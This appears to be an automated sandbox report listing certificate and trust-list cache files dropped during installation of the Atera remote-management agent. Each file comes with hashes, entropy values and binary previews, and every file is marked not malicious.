                                                                                                                                                                                                                                                                          Preview:...Running a transacted installation.....Beginning the Install phase of the installation...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Install phase completed successfully, and the Commit phase is beginning...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Commit phase completed successfully.....The transacted install has completed...

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1A374813EDB1A6631387E414D3E73232

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):111002
                                                                                                                                                                                                                                                                          Entropy (8bit):6.451729490748972
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:kPzgm47BQL7ZMFPZ7t0zfIagnbSLDII+D61SdOkC7/:kbgN7BGFoZ7+gbE8pD61JL
                                                                                                                                                                                                                                                                          MD5:E43056855200281951812F3A6D94EFF7
                                                                                                                                                                                                                                                                          SHA1:66253EFEAE45E17339D00E2277A4E619E7E2FABC
                                                                                                                                                                                                                                                                          SHA-256:04A68A7F0A5E5AEE56899E2080B5E5C6FCC35564F470551E8FB2031C45F2B03F
                                                                                                                                                                                                                                                                          SHA-512:B98CAAD890078D0FE69F35176AB294380D98B480E6BD973DA10EE31B175E63A53C5E4DFB61405B7FAB85EA5D5FB01C4869287B70D7FE2F3F50F619C313F8911C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:0....0...|...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..241123125041Z..241130125041Z0....0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):471
                                                                                                                                                                                                                                                                          Entropy (8bit):7.187019651177751
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:JyYOzg5GLsHzqTykJ0Ysbwsn5SWPYkq3n:JRO0ILsyJ0Y+Z5lYn
                                                                                                                                                                                                                                                                          MD5:441A4996E2EE86C4B588D8C0D407E7C2
                                                                                                                                                                                                                                                                          SHA1:0987D79EAECF4AFAD0E5C6F7BD9BD0A90CEABBD4
                                                                                                                                                                                                                                                                          SHA-256:300CFA12D5560F2B04E870FE42E15B6A2007E8F53E4CE1329BD506382075E657
                                                                                                                                                                                                                                                                          SHA-512:8D6D5BD1EA7BAAFEB8CA750CE112ED7FAD1477E1DEEF34994A145893EED217D1A9990A52D76790F8C00484378778504626E5C6A5F5193B8DA661AFDBD62600B0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:0..........0.....+.....0......0...0......E....1-Q...!..m....20241123190516Z0s0q0I0...+...........@..D3=?..Mn8...Q..E....1-Q...!..m..........-...P..@.Z....20241123190516Z....20241130190516Z0...*.H............._......Ym...[....K..r.....D.|.7...6/.Dd...bx*8..:.#B.....-W..3K.bW...._...........E......82oTc.",...d3C...X...U.....}.&9?...+.}{~..L|........9=..\R..{*.J/..I;:.P.H.....3..*..x....>.?.Vu{r....Jx`.i..\"{.8Kz.....z.....wD.4...O.....\"y

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):71954
                                                                                                                                                                                                                                                                          Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):727
                                                                                                                                                                                                                                                                          Entropy (8bit):7.537072345098989
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:5o6Tq9R5h44TUqrqILBKSB/P8KcFHiGIkZEaOR6qtcO4CoTBF/ZW9FD1QvuTw/n/:54oqXVKSBH8KqiGZtfqiOboTBF4l1ve/
                                                                                                                                                                                                                                                                          MD5:49BA85BE2CB152368FE6EE8982CF3D76
                                                                                                                                                                                                                                                                          SHA1:F078FDB44C9C62D64DC79849C7E41DEC4441A9C0
                                                                                                                                                                                                                                                                          SHA-256:28B91A2A15DFCE2BB789D5CF10E55DC8D46418AF6E8574CBA83CCAD4D396BE68
                                                                                                                                                                                                                                                                          SHA-512:67F5293A94BF17ED5031EEC51EE06BBC467860CDC48A2712694418185C0D400386BCD3D3C4FB46E7B5E50EEE1A6A4747707A3058D0C982B4CB16E8374816E787
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:0..........0.....+.....0......0...0......h7..;._....a{..e.NB..20241123213707Z0s0q0I0...+.........]....^Idk...NG.X....h7..;._....a{..e.NB...(I.x...#...R....20241123212102Z....20241130202102Z0...*.H.............hW.~...z~.4u...VR)..../.9 .....Z...{.-....9F.4.>.....&.......5IyX._y..7.a...?...=....8......o..I6...7.G.1..h*.*`.. ......(q.t...#VT.>..}.lzI2k...j.E.}s....V......F..s..O.X(x......g..9u7@!......eQ......\;..'..J5...z...JA~8....X..-.X..c..U..@K..6L...P.G.........q..z.1........i]...I..e.%...3P..m....x.....H.......Q..... Cz*.sPT.6.5.DY....o?..Z..6..>...c.-.+g.VQ...kq...N...T..X...N.p..YQ".3>_......q.Y=.[.*.Xg..4=...DvN.^.[...{..dU{P%..k. ...Ek....c[.OM.].|..o.@...1..P..4..\..*.._J.z0Y

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):737
                                                                                                                                                                                                                                                                          Entropy (8bit):7.5557187233228245
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:yeRLaWQMnFQlRAUcncFfBJurIT/L3wH/c9q5kvs0LQ+TDOFbx2UJhE47J:y2GWnSxuctGeqiW+Lp6L2ehE47J
                                                                                                                                                                                                                                                                          MD5:3DE65469B9F550FA32724673E299DFE2
                                                                                                                                                                                                                                                                          SHA1:4AAA64A5E233B459C3D4A5BCDD6EB115990C880D
                                                                                                                                                                                                                                                                          SHA-256:36BD170660F76039F65092E3CFB6F5AE7E6CE34E8E7321FABA7059E8407E3EB8
                                                                                                                                                                                                                                                                          SHA-512:642459FD1971BD4EBBC4C7128515F15D1F8AF15FE9AA5E992BDA18BB25B5913F3C36FCB1D9CA9D184C58F92295639976E3ECED7FEE5DEBB672C8F230EB31CD6E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..241119210859Z..241210210859Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............Io}x.N~...b...".F>.b9..9...(...lH.!.Pr.X..._..<.C...t....(.q....D..?...k..*.rN...{...c..=./O.G......{....a.i=}.|Cy...~......6.N.p.....)...1.;QE.\x)U.|.:.6.....(-T.....7.9.l.b..X....v..W.`..u.%T.VOHF.0.A...P...iv.Z...n0*k..w.mA.9e.'.w.....b......P.....2..X...ph.7Z..........s.'.. f...9F"....J...6../a..a..nl.IW.V..%z.....B...3.2.:hw...2b.Q._.i..N....=....F.f.%P.j.c}.sY;.+y.E.....V..7..CEj.....r.G.B.T..p....e.wa..8R..X..!..2*L.g.gx.f?e...J..FB.*.....S{..x....y.QF/.0K'....+..N....G..=.'..g....

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1716
                                                                                                                                                                                                                                                                          Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                                          MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                                          SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                                          SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                                          SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):727
                                                                                                                                                                                                                                                                          Entropy (8bit):7.534031201200033
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:5onfZUxc5RlRtBfQOx/hsLzjyNiA6M4SjmFjt5Y1DohqGoz7UcN/YNjoRLUE2lH2:5iCxcdZbxJqjFJ5mDohqocRYN7latn
                                                                                                                                                                                                                                                                          MD5:3AA154C597F0D3EF221B82298CE04F78
                                                                                                                                                                                                                                                                          SHA1:C15D53176E903BFAB12665B3E42D1B9ECCFB54D0
                                                                                                                                                                                                                                                                          SHA-256:B75A76C1C71E981D5299E2A8F85D317D14DA91FD79A615C70EF14876EBC9557D
                                                                                                                                                                                                                                                                          SHA-512:B9B93ED7F99E8B96EFB85A4DC9A8CEE9F7057B87DA9C2A1FE82FE8CD308F89C42E76E9170BB429999E1D985AF7847463B8C60173C44413685472E0B5E2306324
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241123184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241123184215Z....20241130184215Z0...*.H................m.iQ...1..L....W..,dJ?..0|.R}......t@.U..6.....q.*...XbF.._+_Q...X.fx.m...J..e.4.Lh.._D!.$.......(T.P._.d...A....&R.?H..#)buHT...a..a.+.D..z...cH...;..\.m....D..R5..k.+ci!=dR.\..z.4q...i.Rj.M...A..=./..J*%?m"..+\....q.D.J.",3.....0p)+.OF.r]..'....}...cN..^8s....v.|O........:.<TK.f.I.....B...=.}sU.Y....E.h...&.....S......C...l..9...&h..H....$]....w....n2n....a5.{..a......|..!v...C..3......s.2.,.......B..{!]...7..}.M[3X*..&.y.................@{.f.Y7*)w..6.dh.b]@...!.c.5...r..7m..

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1428
                                                                                                                                                                                                                                                                          Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                                          MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                                          SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                                          SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                                          SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1A374813EDB1A6631387E414D3E73232

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):306
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8894944626035475
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:kKZPWsDL6T/lSrs0d5DRAUSW0P3PeXJUwh8lmi36lImJGelN:3L+/IrHd51xSW0P3PeXJUZ6NXlN
                                                                                                                                                                                                                                                                          MD5:F23F54EA8D61AC2B6E5891B11BDFF6C1
                                                                                                                                                                                                                                                                          SHA1:10E5BF1B21A3545506EA567F91707271DA2E41AD
                                                                                                                                                                                                                                                                          SHA-256:8A074C5618C1DE918BB7847EBFBB16623633611753AEE6D793FFB4D6D3660ADC
                                                                                                                                                                                                                                                                          SHA-512:7A3B1152E2A64C6D524836B2FDE0A9523E7980F9FE9D4F6242C2C173E4E1F7D576F9375091BFC3496B4FA5F2D910204B8CDA2527D444C2F26A910E279698CD97
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:p...... ........;.0.a>..(.................fM.=....Jv&C....................Jv&C.. .........e..=.. ..."...............h.t.t.p.:././.c.r.l.3...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.l...".6.7.4.1.d.5.5.d.-.1.b.1.9.a."...

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):338
                                                                                                                                                                                                                                                                          Entropy (8bit):3.431815599541661
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:kKg48CODJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:44KIkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                                          MD5:B789644DE46E6501E73D343E54CA0001
                                                                                                                                                                                                                                                                          SHA1:FF53F111EDCDD0A35366EA0312D9C3115346C2F8
                                                                                                                                                                                                                                                                          SHA-256:247A15E7B4806C0BEFBEEB07BAA092D5C31754D3F5AB0346F4EA2EBCABC55631
                                                                                                                                                                                                                                                                          SHA-512:A8FC877F1FDD2F4128E5B2E06A20DF8163A04A0166935690EB51590AEE6C4DDC9C7C2B4AD7881F44F741894E67F1C8CC7E8EDB57F1DD10370C459B1D247523BD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:p...... ........yi......(.................................................;..>.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):400
                                                                                                                                                                                                                                                                          Entropy (8bit):3.9245594820040686
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:kKLlvWhqXlF3sIEXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:RXn3MmxMiv8sFzD3quqDkPh8Y2ZM
                                                                                                                                                                                                                                                                          MD5:B0D19B729602029B75D139F3172EA5C3
                                                                                                                                                                                                                                                                          SHA1:E8E06F34F15B1DFAB3ED1D941EEDF9EAC5E0AF84
                                                                                                                                                                                                                                                                          SHA-256:D123A68AB60B9071E81D2902BC7FECF4CD6BB34CAD5ABE531A37B56A564D3C34
                                                                                                                                                                                                                                                                          SHA-512:0AF6BCA97BD374199037A3715E088376D0312459663A32CF3054F1E49A4EEC71FA5B873A5CD913B4B2AB616F567E1AEB93DF845D9C13D76F5631F2DA845DD8CE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:p...... ............Y>..(................~...=....o.ZC....................o.ZC.. .........ALW>.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):290
                                                                                                                                                                                                                                                                          Entropy (8bit):2.9844219596585932
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:kKwsL9Usw9L+N+SkQlPlEGYRMY9z+4KlDA3RUe/:YD9LNkPlE99SNxAhUe/
                                                                                                                                                                                                                                                                          MD5:CB15D8A2335763AE9D63D265FD39FB44
                                                                                                                                                                                                                                                                          SHA1:DAEC03D6866BB5900A4A0A5F3EE86C1BBF44E7E1
                                                                                                                                                                                                                                                                          SHA-256:85B3B8EC00CED3F0672C8425F5BA4D6778F3D070632DA4D0F6B3F810AA104F89
                                                                                                                                                                                                                                                                          SHA-512:A0C70DF01B0CD4CC64C62C47C94D80688DAD7744997095DA57D80FB6AF9DF04BD9465197B84B01613C9BBA3F7F0BAECEA22F556584B0103595CD5DA887582E35
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:p...... .........}.._>..(....................................................... ........G..@.......................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):404
                                                                                                                                                                                                                                                                          Entropy (8bit):3.544652119294851
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:kK3BKpY4YfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhl+KscSikKYlF:ZKUmxMiv8sF3HtllJZIvOP205scn8
                                                                                                                                                                                                                                                                          MD5:1133E0748B013278E1A937DDC1E3E9DC
                                                                                                                                                                                                                                                                          SHA1:D861B00B4B26600C09D4C03D16BDF12D39CC6C7C
                                                                                                                                                                                                                                                                          SHA-256:8FF7A040AE9E9ADAD15CC23D3C10934EB26CA3FBE6CF343B4894D2272B8DB453
                                                                                                                                                                                                                                                                          SHA-512:C89A1FB101F21D4417051785339D5BCECA67D9B78BEC006D797BECB3C6ABE5FB29F313E076CC611B57F46E9999E4DB864E6CC6B32EF0D4A57E24AD230B397135
                                                                                                                                                                                                                                                                          Malicious:false
